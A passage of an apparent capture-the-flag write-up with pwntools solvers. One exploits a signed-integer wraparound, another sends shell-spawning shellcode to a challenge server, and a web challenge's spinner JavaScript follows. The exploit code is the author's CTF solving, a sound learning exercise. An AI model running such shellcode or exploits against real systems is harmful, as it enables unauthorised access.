class=\"language-text\">detrust</code> value supplied as input.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 740px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9d0ba1bd38ebd3ea734547d54a9d93e2/50383/image-20240602180922808.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 87.08333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              
srcset=\"/static/9d0ba1bd38ebd3ea734547d54a9d93e2/8ac56/image-20240602180922808.webp 240w,\n/static/9d0ba1bd38ebd3ea734547d54a9d93e2/d3be9/image-20240602180922808.webp 480w,\n/static/9d0ba1bd38ebd3ea734547d54a9d93e2/ca4a8/image-20240602180922808.webp 740w\"\n              sizes=\"(max-width: 740px) 100vw, 740px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9d0ba1bd38ebd3ea734547d54a9d93e2/8ff5a/image-20240602180922808.png 240w,\n/static/9d0ba1bd38ebd3ea734547d54a9d93e2/e85cb/image-20240602180922808.png 480w,\n/static/9d0ba1bd38ebd3ea734547d54a9d93e2/50383/image-20240602180922808.png 740w\"\n            sizes=\"(max-width: 740px) 100vw, 740px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9d0ba1bd38ebd3ea734547d54a9d93e2/50383/image-20240602180922808.png\"\n            alt=\"image-20240602180922808\"\n            title=\"image-20240602180922808\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>However, <code class=\"language-text\">detrust</code> must be non-negative, and it is not possible to supply a value that sets <code class=\"language-text\">trust_level</code> to exactly <code class=\"language-text\">0x7ffffffe</code> directly.</p>\n<p>That said, entering the correct string afterward decrements <code class=\"language-text\">trust_level</code> by 1 each time, and decrementing a signed integer past its minimum value wraps it around to the maximum positive value.</p>\n<p>The plan is therefore: supply <code class=\"language-text\">2147483646</code> as the input (which sets <code class=\"language-text\">trust_level</code> as close to <code class=\"language-text\">0x7ffffffe</code> as possible), then enter the correct string twice to push <code class=\"language-text\">trust_level</code> over the threshold and obtain the flag.</p>\n<p>I wrote the following 
solver to automate this.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Set context</span>\nCONTEXT <span class=\"token operator\">=</span> <span class=\"token string\">\"debug\"</span>\ncontext<span class=\"token punctuation\">.</span>log_level <span class=\"token operator\">=</span> CONTEXT\n\n<span class=\"token comment\"># Set target</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./exam\"</span>\nexe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Run program</span>\n<span class=\"token comment\"># is_gdb = True</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">False</span>\n<span class=\"token comment\"># GDB commands for the debug run; left empty here, only used when is_gdb is True</span>\ngdbscript <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span>\n<span class=\"token keyword\">if</span> is_gdb<span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> gdb<span class=\"token punctuation\">.</span>debug<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">,</span> aslr<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">,</span> gdbscript<span class=\"token operator\">=</span>gdbscript<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"challs.actf.co\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">31322</span><span class=\"token punctuation\">)</span>\n    <span class=\"token comment\"># target = process(TARGET_PATH)</span>\n\n<span 
class=\"token comment\"># Exploit</span>\ntarget<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">b\"How much should I not trust you? >:)\"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"2147483646\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">while</span> <span class=\"token boolean\">True</span><span class=\"token punctuation\">:</span>\n    target<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Prove your trustworthyness by\"</span><span class=\"token punctuation\">)</span>\n    payload <span class=\"token operator\">=</span> <span class=\"token string\">b\"I confirm that I am taking this exam between the dates 5/24/2024 and 5/27/2024. 
I will not disclose any information about any section of this exam.\"</span>\n    target<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Running this solver successfully retrieved the correct flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ff0ad487b8648077c8589d40d52b3187/27f8b/image-20240525234440546.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 45.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ff0ad487b8648077c8589d40d52b3187/8ac56/image-20240525234440546.webp 240w,\n/static/ff0ad487b8648077c8589d40d52b3187/d3be9/image-20240525234440546.webp 480w,\n/static/ff0ad487b8648077c8589d40d52b3187/e46b2/image-20240525234440546.webp 960w,\n/static/ff0ad487b8648077c8589d40d52b3187/f992d/image-20240525234440546.webp 1440w,\n/static/ff0ad487b8648077c8589d40d52b3187/1d28e/image-20240525234440546.webp 1730w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ff0ad487b8648077c8589d40d52b3187/8ff5a/image-20240525234440546.png 240w,\n/static/ff0ad487b8648077c8589d40d52b3187/e85cb/image-20240525234440546.png 480w,\n/static/ff0ad487b8648077c8589d40d52b3187/d9199/image-20240525234440546.png 960w,\n/static/ff0ad487b8648077c8589d40d52b3187/07a9c/image-20240525234440546.png 
1440w,\n/static/ff0ad487b8648077c8589d40d52b3187/27f8b/image-20240525234440546.png 1730w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ff0ad487b8648077c8589d40d52b3187/d9199/image-20240525234440546.png\"\n            alt=\"image-20240525234440546\"\n            title=\"image-20240525234440546\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"presidentialpwn\" style=\"position:relative;\"><a href=\"#presidentialpwn\" aria-label=\"presidentialpwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>presidential(Pwn)</h2>\n<blockquote>\n<p>👍</p>\n</blockquote>\n<p>In place of a binary, the challenge provides the following Python script.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\">#!/usr/local/bin/python</span>\n\n<span class=\"token keyword\">import</span> ctypes\n<span class=\"token keyword\">import</span> mmap\n<span class=\"token keyword\">import</span> sys\n\nflag <span class=\"token operator\">=</span> <span class=\"token string\">\"redacted\"</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"White House declared 
Python to be memory safe :tm:\"</span><span class=\"token punctuation\">)</span>\n\nbuf <span class=\"token operator\">=</span> mmap<span class=\"token punctuation\">.</span>mmap<span class=\"token punctuation\">(</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> mmap<span class=\"token punctuation\">.</span>PAGESIZE<span class=\"token punctuation\">,</span> prot<span class=\"token operator\">=</span>mmap<span class=\"token punctuation\">.</span>PROT_READ <span class=\"token operator\">|</span> mmap<span class=\"token punctuation\">.</span>PROT_WRITE <span class=\"token operator\">|</span> mmap<span class=\"token punctuation\">.</span>PROT_EXEC<span class=\"token punctuation\">)</span>\nftype <span class=\"token operator\">=</span> ctypes<span class=\"token punctuation\">.</span>CFUNCTYPE<span class=\"token punctuation\">(</span>ctypes<span class=\"token punctuation\">.</span>c_void_p<span class=\"token punctuation\">)</span>\nfpointer <span class=\"token operator\">=</span> ctypes<span class=\"token punctuation\">.</span>c_void_p<span class=\"token punctuation\">.</span>from_buffer<span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">)</span>\nf <span class=\"token operator\">=</span> ftype<span class=\"token punctuation\">(</span>ctypes<span class=\"token punctuation\">.</span>addressof<span class=\"token punctuation\">(</span>fpointer<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\nu_can_do_it <span class=\"token operator\">=</span> <span class=\"token builtin\">bytes</span><span class=\"token punctuation\">.</span>fromhex<span class=\"token punctuation\">(</span><span class=\"token builtin\">input</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"So enter whatever you want 👍 (in hex): \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\nbuf<span 
class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>u_can_do_it<span class=\"token punctuation\">)</span>\n\nf<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">del</span> fpointer\nbuf<span class=\"token punctuation\">.</span>close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"byebye\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Reading this code makes it clear that it writes the hex-decoded input into a page mapped readable, writable and executable, then calls that page through a <code class=\"language-text\">ctypes</code> function pointer, so it simply executes whatever shellcode is provided.</p>\n<p>I wrote the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\ntarget <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"challs.actf.co\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">31200</span><span class=\"token punctuation\">)</span>\n\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">'amd64'</span>\nshellcode <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>amd64<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>sh<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nassembled_shellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>shellcode<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Exploit</span>\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token 
punctuation\">(</span><span class=\"token string\">b\"(in hex): \"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> assembled_shellcode<span class=\"token punctuation\">.</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>This gave us a shell and allowed us to retrieve the flag successfully.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f1c14edb30d75518f203892d07a61dd3/7161f/image-20240526175856054.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 67.08333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f1c14edb30d75518f203892d07a61dd3/8ac56/image-20240526175856054.webp 240w,\n/static/f1c14edb30d75518f203892d07a61dd3/d3be9/image-20240526175856054.webp 480w,\n/static/f1c14edb30d75518f203892d07a61dd3/e46b2/image-20240526175856054.webp 
960w,\n/static/f1c14edb30d75518f203892d07a61dd3/575d1/image-20240526175856054.webp 1182w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f1c14edb30d75518f203892d07a61dd3/8ff5a/image-20240526175856054.png 240w,\n/static/f1c14edb30d75518f203892d07a61dd3/e85cb/image-20240526175856054.png 480w,\n/static/f1c14edb30d75518f203892d07a61dd3/d9199/image-20240526175856054.png 960w,\n/static/f1c14edb30d75518f203892d07a61dd3/7161f/image-20240526175856054.png 1182w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f1c14edb30d75518f203892d07a61dd3/d9199/image-20240526175856054.png\"\n            alt=\"image-20240526175856054\"\n            title=\"image-20240526175856054\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"spinnerweb\" style=\"position:relative;\"><a href=\"#spinnerweb\" aria-label=\"spinnerweb permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>spinner(Web)</h2>\n<blockquote>\n<p>spin 10,000 times for flag</p>\n</blockquote>\n<p>Accessing the challenge server launches an application that counts how many times you spin a ball by holding and dragging the mouse.</p>\n<p><span\n      
class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 364px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/08f06f592755faf5895833785927ba3e/e45a9/image-20240525234656517.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 124.58333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAZCAYAAAAxFw7TAAAACXBIWXMAAAsTAAALEwEAmpwYAAABC0lEQVQ4y+2Vaw6CMBCEuf9lvIEXwWgCCjFBEl4igXZ0XSpFoFTRP8YmG6bt5KPbpcXBh5vzB34HKGX3HAvdMwt8ho3Nm6DOFEy1pgHKkoO0yWtcIbU0BcIQOBw4SNPYmHdyhcqUJIDvMygIOEjTGM1NbctoynXdARRMh9KTPLMpq8miAPb7IUSlTnPksQbmeR+oQ49H1uSxBlbVcO+oILsdsFoBrvtCysoQx1wABSWg5wHrNWurouhvFAI4nWRbWXkP0lkml33YZSlvEN4z0s8e65RZc6e6nG9VzdtxaTyejvmssoiiCBt3226FMJ712etLQUUjev237kNOTz4gczAroA5evMLf/KdcAYycueIa4ysGAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/08f06f592755faf5895833785927ba3e/8ac56/image-20240525234656517.webp 240w,\n/static/08f06f592755faf5895833785927ba3e/1555d/image-20240525234656517.webp 364w\"\n              sizes=\"(max-width: 364px) 100vw, 364px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/08f06f592755faf5895833785927ba3e/8ff5a/image-20240525234656517.png 240w,\n/static/08f06f592755faf5895833785927ba3e/e45a9/image-20240525234656517.png 364w\"\n            sizes=\"(max-width: 364px) 100vw, 364px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/08f06f592755faf5895833785927ba3e/e45a9/image-20240525234656517.png\"\n            alt=\"image-20240525234656517\"\n            title=\"image-20240525234656517\"\n            
loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reading the server-side code shows that the flag is returned once the count exceeds 10,000.</p>\n<div class=\"gatsby-highlight\" data-language=\"javascript\"><pre class=\"language-javascript\"><code class=\"language-javascript\"><span class=\"token keyword\">const</span> state <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token literal-property property\">dragging</span><span class=\"token operator\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">,</span>\n    <span class=\"token literal-property property\">value</span><span class=\"token operator\">:</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span>\n    <span class=\"token literal-property property\">total</span><span class=\"token operator\">:</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span>\n    <span class=\"token literal-property property\">flagged</span><span class=\"token operator\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">const</span> <span class=\"token function-variable function\">message</span> <span class=\"token operator\">=</span> <span class=\"token keyword\">async</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>state<span class=\"token punctuation\">.</span>flagged<span class=\"token punctuation\">)</span> <span class=\"token keyword\">return</span>\n    <span class=\"token keyword\">const</span> element 
<span class=\"token operator\">=</span> document<span class=\"token punctuation\">.</span><span class=\"token function\">querySelector</span><span class=\"token punctuation\">(</span><span class=\"token string\">'.message'</span><span class=\"token punctuation\">)</span>\n    element<span class=\"token punctuation\">.</span>textContent <span class=\"token operator\">=</span> Math<span class=\"token punctuation\">.</span><span class=\"token function\">floor</span><span class=\"token punctuation\">(</span>state<span class=\"token punctuation\">.</span>total <span class=\"token operator\">/</span> <span class=\"token number\">360</span><span class=\"token punctuation\">)</span>\n\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>state<span class=\"token punctuation\">.</span>total <span class=\"token operator\">>=</span> <span class=\"token number\">10_000</span> <span class=\"token operator\">*</span> <span class=\"token number\">360</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        state<span class=\"token punctuation\">.</span>flagged <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span>\n        <span class=\"token keyword\">const</span> response <span class=\"token operator\">=</span> <span class=\"token keyword\">await</span> <span class=\"token function\">fetch</span><span class=\"token punctuation\">(</span><span class=\"token string\">'/falg'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">{</span> <span class=\"token literal-property property\">method</span><span class=\"token operator\">:</span> <span class=\"token string\">'POST'</span> <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n        element<span class=\"token punctuation\">.</span>textContent <span class=\"token operator\">=</span> <span class=\"token keyword\">await</span> response<span class=\"token 
punctuation\">.</span><span class=\"token function\">text</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token function\">message</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">const</span> <span class=\"token function-variable function\">draw</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">const</span> spinner <span class=\"token operator\">=</span> document<span class=\"token punctuation\">.</span><span class=\"token function\">querySelector</span><span class=\"token punctuation\">(</span><span class=\"token string\">'.spinner'</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">const</span> degrees <span class=\"token operator\">=</span> state<span class=\"token punctuation\">.</span>value\n    spinner<span class=\"token punctuation\">.</span>style<span class=\"token punctuation\">.</span>transform <span class=\"token operator\">=</span> <span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">rotate(</span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span>degrees<span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">deg)</span><span class=\"token template-punctuation string\">`</span></span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">const</span> <span class=\"token function-variable function\">down</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span 
class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    state<span class=\"token punctuation\">.</span>dragging <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">const</span> <span class=\"token function-variable function\">move</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">e</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span>state<span class=\"token punctuation\">.</span>dragging<span class=\"token punctuation\">)</span> <span class=\"token keyword\">return</span>\n\n    <span class=\"token keyword\">const</span> spinner <span class=\"token operator\">=</span> document<span class=\"token punctuation\">.</span><span class=\"token function\">querySelector</span><span class=\"token punctuation\">(</span><span class=\"token string\">'.spinner'</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">const</span> center <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token literal-property property\">x</span><span class=\"token operator\">:</span> spinner<span class=\"token punctuation\">.</span>offsetLeft <span class=\"token operator\">+</span> spinner<span class=\"token punctuation\">.</span>offsetWidth <span class=\"token operator\">/</span> <span class=\"token number\">2</span><span class=\"token punctuation\">,</span>\n        <span class=\"token literal-property property\">y</span><span class=\"token operator\">:</span> spinner<span class=\"token punctuation\">.</span>offsetTop <span class=\"token operator\">+</span> 
spinner<span class=\"token punctuation\">.</span>offsetHeight <span class=\"token operator\">/</span> <span class=\"token number\">2</span><span class=\"token punctuation\">,</span>\n    <span class=\"token punctuation\">}</span>\n    <span class=\"token keyword\">const</span> dy <span class=\"token operator\">=</span> e<span class=\"token punctuation\">.</span>clientY <span class=\"token operator\">-</span> center<span class=\"token punctuation\">.</span>y\n    <span class=\"token keyword\">const</span> dx <span class=\"token operator\">=</span> e<span class=\"token punctuation\">.</span>clientX <span class=\"token operator\">-</span> center<span class=\"token punctuation\">.</span>x\n    <span class=\"token keyword\">const</span> angle <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>Math<span class=\"token punctuation\">.</span><span class=\"token function\">atan2</span><span class=\"token punctuation\">(</span>dy<span class=\"token punctuation\">,</span> dx<span class=\"token punctuation\">)</span> <span class=\"token operator\">*</span> <span class=\"token number\">180</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">/</span> Math<span class=\"token punctuation\">.</span><span class=\"token constant\">PI</span>\n\n    <span class=\"token keyword\">const</span> value <span class=\"token operator\">=</span> angle <span class=\"token operator\">&lt;</span> <span class=\"token number\">0</span> <span class=\"token operator\">?</span> <span class=\"token number\">360</span> <span class=\"token operator\">+</span> angle <span class=\"token operator\">:</span> angle\n    <span class=\"token keyword\">const</span> change <span class=\"token operator\">=</span> value <span class=\"token operator\">-</span> state<span class=\"token punctuation\">.</span>value\n\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token number\">0</span> <span class=\"token 
operator\">&lt;</span> change <span class=\"token operator\">&amp;&amp;</span> change <span class=\"token operator\">&lt;</span> <span class=\"token number\">180</span><span class=\"token punctuation\">)</span> state<span class=\"token punctuation\">.</span>total <span class=\"token operator\">+=</span> change\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token number\">0</span> <span class=\"token operator\">></span> change <span class=\"token operator\">&amp;&amp;</span> change <span class=\"token operator\">></span> <span class=\"token operator\">-</span><span class=\"token number\">180</span><span class=\"token punctuation\">)</span> state<span class=\"token punctuation\">.</span>total <span class=\"token operator\">+=</span> change\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>change <span class=\"token operator\">></span> <span class=\"token number\">180</span><span class=\"token punctuation\">)</span> state<span class=\"token punctuation\">.</span>total <span class=\"token operator\">-=</span> <span class=\"token number\">360</span> <span class=\"token operator\">-</span> change\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>change <span class=\"token operator\">&lt;</span> <span class=\"token operator\">-</span><span class=\"token number\">180</span><span class=\"token punctuation\">)</span> state<span class=\"token punctuation\">.</span>total <span class=\"token operator\">+=</span> <span class=\"token number\">360</span> <span class=\"token operator\">+</span> change\n\n    state<span class=\"token punctuation\">.</span>value <span class=\"token operator\">=</span> value\n\n    <span class=\"token function\">draw</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">message</span><span class=\"token punctuation\">(</span><span class=\"token 
punctuation\">)</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">const</span> <span class=\"token function-variable function\">up</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    state<span class=\"token punctuation\">.</span>dragging <span class=\"token operator\">=</span> <span class=\"token boolean\">false</span>\n<span class=\"token punctuation\">}</span>\n\ndocument<span class=\"token punctuation\">.</span><span class=\"token function\">querySelector</span><span class=\"token punctuation\">(</span><span class=\"token string\">'.handle'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">addEventListener</span><span class=\"token punctuation\">(</span><span class=\"token string\">'mousedown'</span><span class=\"token punctuation\">,</span> down<span class=\"token punctuation\">)</span>\nwindow<span class=\"token punctuation\">.</span><span class=\"token function\">addEventListener</span><span class=\"token punctuation\">(</span><span class=\"token string\">'mousemove'</span><span class=\"token punctuation\">,</span> move<span class=\"token punctuation\">)</span>\nwindow<span class=\"token punctuation\">.</span><span class=\"token function\">addEventListener</span><span class=\"token punctuation\">(</span><span class=\"token string\">'mouseup'</span><span class=\"token punctuation\">,</span> up<span class=\"token punctuation\">)</span>\nwindow<span class=\"token punctuation\">.</span><span class=\"token function\">addEventListener</span><span class=\"token punctuation\">(</span><span class=\"token string\">'blur'</span><span class=\"token punctuation\">,</span> up<span class=\"token punctuation\">)</span>\nwindow<span class=\"token punctuation\">.</span><span class=\"token 
